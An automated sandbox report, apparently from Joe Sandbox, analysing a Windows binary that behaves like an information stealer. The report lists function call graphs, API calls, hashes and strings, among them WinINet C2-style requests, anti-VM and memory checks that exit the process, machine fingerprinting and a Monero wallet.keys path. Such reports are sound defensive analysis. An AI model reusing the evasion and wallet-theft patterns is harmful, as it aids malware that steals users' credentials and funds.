                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 95c4bca672dd090e52cd2ae6c4337acf74c53222e58ee9c13e7114b194b357f9
                                • Instruction ID: 862f8ab37906f55ad20dd5cbe0a66f0dbbff19d00526dceb639678de52170230
                                • Opcode Fuzzy Hash: 95c4bca672dd090e52cd2ae6c4337acf74c53222e58ee9c13e7114b194b357f9
                                • Instruction Fuzzy Hash: ED624CB6504240BFE345DFA8ED8AD963BF9F7AC303304C51AA689C3264D73D9841CB5A
                                Function 004F6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 4f6280-4f630b call 50a7a0 call 4f47b0 call 50a740 InternetOpenA StrCmpCA 1040 4f630d 1033->1040 1041 4f6314-4f6318 1033->1041 1040->1041 1042 4f631e-4f6342 InternetConnectA 1041->1042 1043 4f6509-4f6525 call 50a7a0 call 50a800 * 2 1041->1043 1045 4f64ff-4f6503 InternetCloseHandle 1042->1045 1046 4f6348-4f634c 1042->1046 1062 4f6528-4f652d 1043->1062 1045->1043 1048 4f634e-4f6358 1046->1048 1049 4f635a 1046->1049 1051 4f6364-4f6392 HttpOpenRequestA 1048->1051 1049->1051 1053 4f6398-4f639c 1051->1053 1054 4f64f5-4f64f9 InternetCloseHandle 1051->1054 1056 4f639e-4f63bf InternetSetOptionA 1053->1056 1057 4f63c5-4f6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1058 4f642c-4f644b call 508940 1057->1058 1059 4f6407-4f6427 call 50a740 call 50a800 * 2 1057->1059 1067 4f644d-4f6454 1058->1067 1068 4f64c9-4f64e9 call 50a740 call 50a800 * 2 1058->1068 1059->1062 1071 4f64c7-4f64ef InternetCloseHandle 1067->1071 1072 4f6456-4f6480 InternetReadFile 1067->1072 1068->1062 1071->1054 1076 4f648b 1072->1076 1077 4f6482-4f6489 1072->1077 1076->1071 1077->1076 1080 4f648d-4f64c5 call 50a9b0 call 50a8a0 call 50a800 1077->1080 1080->1072
                                APIs
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 004F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004F4839
                                  • Part of subcall function 004F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004F4849
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • InternetOpenA.WININET(00510DFE,00000001,00000000,00000000,00000000), ref: 004F62E1
                                • StrCmpCA.SHLWAPI(?,012DE250), ref: 004F6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004F6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,012DDC38,00000000,00000000,00400100,00000000), ref: 004F6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004F63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004F63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004F63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004F646D
                                • InternetCloseHandle.WININET(00000000), ref: 004F64EF
                                • InternetCloseHandle.WININET(00000000), ref: 004F64F9
                                • InternetCloseHandle.WININET(00000000), ref: 004F6503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 6695fc1e6845eae1fb9139fdb9ab94c14fddb1f7b81736669a2bb3ed63438884
                                • Instruction ID: 913bc391f7d657f29c8fbcf4092592b9c18dcc34fe95c3198c33b247c182bb02
                                • Opcode Fuzzy Hash: 6695fc1e6845eae1fb9139fdb9ab94c14fddb1f7b81736669a2bb3ed63438884
                                • Instruction Fuzzy Hash: 8F710D71A00318ABEB14EBA0DC49FEE7B74FB44701F108199F6096B1D4DBB86A85CF56
                                Function 00505510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 505510-505577 call 505ad0 call 50a820 * 3 call 50a740 * 4 1106 50557c-505583 1090->1106 1107 505585-5055b6 call 50a820 call 50a7a0 call 4f1590 call 5051f0 1106->1107 1108 5055d7-50564c call 50a740 * 2 call 4f1590 call 5052c0 call 50a8a0 call 50a800 call 50aad0 StrCmpCA 1106->1108 1124 5055bb-5055d2 call 50a8a0 call 50a800 1107->1124 1134 505693-5056a9 call 50aad0 StrCmpCA 1108->1134 1138 50564e-50568e call 50a7a0 call 4f1590 call 5051f0 call 50a8a0 call 50a800 1108->1138 1124->1134 1139 5057dc-505844 call 50a8a0 call 50a820 * 2 call 4f1670 call 50a800 * 4 call 506560 call 4f1550 1134->1139 1140 5056af-5056b6 1134->1140 1138->1134 1270 505ac3-505ac6 1139->1270 1143 5057da-50585f call 50aad0 StrCmpCA 1140->1143 1144 5056bc-5056c3 1140->1144 1163 505991-5059f9 call 50a8a0 call 50a820 * 2 call 4f1670 call 50a800 * 4 call 506560 call 4f1550 1143->1163 1164 505865-50586c 1143->1164 1148 5056c5-505719 call 50a820 call 50a7a0 call 4f1590 call 5051f0 call 50a8a0 call 50a800 1144->1148 1149 50571e-505793 call 50a740 * 2 call 4f1590 call 5052c0 call 50a8a0 call 50a800 call 50aad0 StrCmpCA 1144->1149 1148->1143 1149->1143 1249 505795-5057d5 call 50a7a0 call 4f1590 call 5051f0 call 50a8a0 call 50a800 1149->1249 1163->1270 1170 505872-505879 1164->1170 1171 50598f-505a14 call 50aad0 StrCmpCA 1164->1171 1178 5058d3-505948 call 50a740 * 2 call 4f1590 call 5052c0 call 50a8a0 call 50a800 call 50aad0 StrCmpCA 1170->1178 1179 50587b-5058ce call 50a820 call 50a7a0 call 4f1590 call 5051f0 call 50a8a0 call 50a800 1170->1179 1199 505a16-505a21 Sleep 1171->1199 1200 505a28-505a91 call 50a8a0 call 50a820 * 2 call 4f1670 call 50a800 * 4 call 506560 call 4f1550 1171->1200 1178->1171 1275 50594a-50598a call 50a7a0 call 4f1590 call 5051f0 call 50a8a0 call 50a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1143 1275->1171
                                APIs
                                  • Part of subcall function 0050A820: lstrlen.KERNEL32(004F4F05,?,?,004F4F05,00510DDE), ref: 0050A82B
                                  • Part of subcall function 0050A820: lstrcpy.KERNEL32(00510DDE,00000000), ref: 0050A885
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005056A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505857
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                  • Part of subcall function 005051F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505228
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 005052C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505318
                                  • Part of subcall function 005052C0: lstrlen.KERNEL32(00000000), ref: 0050532F
                                  • Part of subcall function 005052C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00505364
                                  • Part of subcall function 005052C0: lstrlen.KERNEL32(00000000), ref: 00505383
                                  • Part of subcall function 005052C0: lstrlen.KERNEL32(00000000), ref: 005053AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0050578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00505940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00505A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00505A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 187248dfb83099d609c75f14392d84e44d29ff0105a220e25fbfc07d90ba4a6b
                                • Instruction ID: 7ce86d997ee19ffd97faef897120b5e22879e92adfe578293352caf25902b2d3
                                • Opcode Fuzzy Hash: 187248dfb83099d609c75f14392d84e44d29ff0105a220e25fbfc07d90ba4a6b
                                • Instruction Fuzzy Hash: 14E12072910209AADB14FBB0DC5BEFE7B38BF94300F50C528B546560D5EF346A49CBA6
                                Function 005017A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 5017a0-5017cd call 50aad0 StrCmpCA 1304 5017d7-5017f1 call 50aad0 1301->1304 1305 5017cf-5017d1 ExitProcess 1301->1305 1309 5017f4-5017f8 1304->1309 1310 5019c2-5019cd call 50a800 1309->1310 1311 5017fe-501811 1309->1311 1313 501817-50181a 1311->1313 1314 50199e-5019bd 1311->1314 1316 501970-501981 StrCmpCA 1313->1316 1317 5018f1-501902 StrCmpCA 1313->1317 1318 501951-501962 StrCmpCA 1313->1318 1319 501932-501943 StrCmpCA 1313->1319 1320 501913-501924 StrCmpCA 1313->1320 1321 501835-501844 call 50a820 1313->1321 1322 50185d-50186e StrCmpCA 1313->1322 1323 50187f-501890 StrCmpCA 1313->1323 1324 501821-501830 call 50a820 1313->1324 1325 501849-501858 call 50a820 1313->1325 1326 5018ad-5018be StrCmpCA 1313->1326 1327 5018cf-5018e0 StrCmpCA 1313->1327 1328 50198f-501999 call 50a820 1313->1328 1314->1309 1329 501983-501986 1316->1329 1330 50198d 1316->1330 1343 501904-501907 1317->1343 1344 50190e 1317->1344 1349 501964-501967 1318->1349 1350 50196e 1318->1350 1347 501945-501948 1319->1347 1348 50194f 1319->1348 1345 501930 1320->1345 1346 501926-501929 1320->1346 1321->1314 1335 501870-501873 1322->1335 1336 50187a 1322->1336 1337 501892-50189c 1323->1337 1338 50189e-5018a1 1323->1338 1324->1314 1325->1314 1339 5018c0-5018c3 1326->1339 1340 5018ca 1326->1340 1341 5018e2-5018e5 1327->1341 1342 5018ec 1327->1342 1328->1314 1329->1330 1330->1314 1335->1336 1336->1314 1355 5018a8 1337->1355 1338->1355 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1345->1314 1346->1345 1347->1348 1348->1314 1349->1350 1350->1314 1355->1314
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 005017C5
                                • ExitProcess.KERNEL32 ref: 005017D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: b90774facba1cbc00fa8642de15ccf1417501ac584c0f9e51f0bed1bf0e7df6f
                                • Instruction ID: 9d9f370d51093ec3c90cff25165167cb9ad9eb7695cf1d9617de08ab00f4900b
                                • Opcode Fuzzy Hash: b90774facba1cbc00fa8642de15ccf1417501ac584c0f9e51f0bed1bf0e7df6f
                                • Instruction Fuzzy Hash: 83516DB4A04209EFDB04DFA4D959AFE7BB5BF44704F10884CE406A72C0D774E991CB6A
                                Function 00507500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 507500-50754a GetWindowsDirectoryA 1357 507553-5075c7 GetVolumeInformationA call 508d00 * 3 1356->1357 1358 50754c 1356->1358 1365 5075d8-5075df 1357->1365 1358->1357 1366 5075e1-5075fa call 508d00 1365->1366 1367 5075fc-507617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 507628-507658 wsprintfA call 50a740 1367->1369 1370 507619-507626 call 50a740 1367->1370 1377 50767e-50768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00507542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0050757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0050760A
                                • wsprintfA.USER32 ref: 00507640
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$Q
                                • API String ID: 1544550907-2387536637
                                • Opcode ID: 0d62994f2d8ee73b0a6f53bda94dcb3f0f1ebe14ec8cbbf47e094e3ed5077d5b
                                • Instruction ID: 88d387510588a38fd9e9caf3a7035f5680ee7e7db761f0559b7e5672d92b8ee1
                                • Opcode Fuzzy Hash: 0d62994f2d8ee73b0a6f53bda94dcb3f0f1ebe14ec8cbbf47e094e3ed5077d5b
                                • Instruction Fuzzy Hash: F5418FB1D04248ABDB10DF94DC49BEEBBB8BB58700F104198F549672C0D7796A44CFA5
                                Function 005069F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0840), ref: 005098A1
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0690), ref: 005098BA
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0558), ref: 005098D2
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0678), ref: 005098EA
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0570), ref: 00509903
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D8930), ref: 0050991B
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012C6760), ref: 00509933
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012C6920), ref: 0050994C
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D05A0), ref: 00509964
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D05B8), ref: 0050997C
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D05E8), ref: 00509995
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D0618), ref: 005099AD
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012C6980), ref: 005099C5
                                  • Part of subcall function 00509860: GetProcAddress.KERNEL32(75900000,012D06F0), ref: 005099DE
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 004F11D0: ExitProcess.KERNEL32 ref: 004F1211
                                  • Part of subcall function 004F1160: GetSystemInfo.KERNEL32(?), ref: 004F116A
                                  • Part of subcall function 004F1160: ExitProcess.KERNEL32 ref: 004F117E
                                  • Part of subcall function 004F1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004F112B
                                  • Part of subcall function 004F1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004F1132
                                  • Part of subcall function 004F1110: ExitProcess.KERNEL32 ref: 004F1143
                                  • Part of subcall function 004F1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004F123E
                                  • Part of subcall function 004F1220: __aulldiv.LIBCMT ref: 004F1258
                                  • Part of subcall function 004F1220: __aulldiv.LIBCMT ref: 004F1266
                                  • Part of subcall function 004F1220: ExitProcess.KERNEL32 ref: 004F1294
                                  • Part of subcall function 00506770: GetUserDefaultLangID.KERNEL32 ref: 00506774
                                  • Part of subcall function 004F1190: ExitProcess.KERNEL32 ref: 004F11C6
                                  • Part of subcall function 00507850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004F11B7), ref: 00507880
                                  • Part of subcall function 00507850: RtlAllocateHeap.NTDLL(00000000), ref: 00507887
                                  • Part of subcall function 00507850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0050789F
                                  • Part of subcall function 005078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507910
                                  • Part of subcall function 005078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00507917
                                  • Part of subcall function 005078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0050792F
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00506AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00506AF9
                                • Sleep.KERNEL32(00001770), ref: 00506B04
                                • CloseHandle.KERNEL32(?,00000000,?,012D89D0,?,0051110C,?,00000000,?,00511110,?,00000000,00510AEF), ref: 00506B1A
                                • ExitProcess.KERNEL32 ref: 00506B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: ee80f2208b03739e02a288ae3314992172d236cf40cef771b8701c986c509e71
                                • Instruction ID: 1fa217eda0621cc3f53785a3ebf932c32f3ff0f9d20ab94414674a19ba3a1fd2
                                • Opcode Fuzzy Hash: ee80f2208b03739e02a288ae3314992172d236cf40cef771b8701c986c509e71
                                • Instruction Fuzzy Hash: F9310F71A0020AAAEB04F7F0DD5BBEE7B78BF84341F108519F202A21D2DF746945C6A6
                                Function 004F1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 4f1220-4f1247 call 5089b0 GlobalMemoryStatusEx 1439 4f1249-4f1271 call 50da00 * 2 1436->1439 1440 4f1273-4f127a 1436->1440 1441 4f1281-4f1285 1439->1441 1440->1441 1443 4f129a-4f129d 1441->1443 1444 4f1287 1441->1444 1447 4f1289-4f1290 1444->1447 1448 4f1292-4f1294 ExitProcess 1444->1448 1447->1443 1447->1448
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004F123E
                                • __aulldiv.LIBCMT ref: 004F1258
                                • __aulldiv.LIBCMT ref: 004F1266
                                • ExitProcess.KERNEL32 ref: 004F1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
